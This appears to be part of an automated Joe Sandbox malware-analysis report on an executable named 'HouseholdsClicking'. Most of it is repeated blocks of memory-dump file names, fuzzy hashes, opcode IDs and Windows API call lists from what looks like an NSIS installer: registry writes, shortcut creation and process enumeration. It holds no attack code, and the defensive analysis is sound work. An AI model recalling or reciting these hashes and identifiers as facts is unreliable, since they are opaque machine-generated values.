                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                            • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                            • API String ID: 3581403547-1792361021
                                                                                                                                            • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                            • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                            • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                            • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                            APIs
                                                                                                                                            • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                            Strings
                                                                                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateInstance
                                                                                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                            • API String ID: 542301482-1377821865
                                                                                                                                            • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                            • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                            • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                            • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                            • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                            • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                            • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                            • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                            • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                            • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                            APIs
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                              • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                            • API String ID: 20674999-2124804629
                                                                                                                                            • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                            • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                            • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                            • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                            APIs
                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                            • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                              • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                            • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                            • String ID: F$N$open
                                                                                                                                            • API String ID: 3928313111-1104729357
                                                                                                                                            • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                            • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                            • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                            • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                            APIs
                                                                                                                                            • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                            • wsprintfA.USER32 ref: 00406B79
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                            • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                            • API String ID: 565278875-3368763019
                                                                                                                                            • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                            • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                            • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                            • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                            APIs
                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                            • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                            • String ID: F
                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                            • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                            • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                            • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                            • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                            • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                            Strings
                                                                                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                            • API String ID: 1641139501-220328614
                                                                                                                                            • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                            • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                            • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                            • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                            APIs
                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                            • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                            • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                            • API String ID: 3734993849-3206598305
                                                                                                                                            • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                            • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                            • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                            • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                            APIs
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                            Strings
                                                                                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
